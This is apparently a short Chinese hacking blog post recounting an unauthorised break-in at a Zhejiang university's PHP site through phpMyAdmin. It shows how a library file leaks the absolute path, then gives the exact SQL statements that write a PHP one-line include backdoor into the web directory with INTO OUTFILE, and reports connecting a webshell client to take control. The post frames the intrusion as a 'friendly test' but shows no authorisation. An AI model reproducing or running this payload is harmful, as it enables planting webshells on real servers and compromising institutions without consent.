友情检测浙江某高校

在某论坛受到启发，尝试对PHP站的检测。

很明显，当然是利用其本身的程序BUG，早在2月都被大牛们搞过，我运气好，于是也搞到了。

当连进phpmyadmin后，访问libraries目录下的select_lang.lib.php文件会直接暴出绝对路径。

登陆成功后我们随便选择一个数据库，然后在sql语句中输入如下内容：
Create TABLE x (cmd text NOT NULL);
Insert INTO x (cmd) VALUES('<?@include($_POST["test"]);?>');
select cmd from x into outfile '/wwwroot/test/phpmyadmin/libraries/1.php';
Drop TABLE IF EXISTS x;
执行后提示成功，拿出一句话客户端，连接一下，成功拿到了webshell。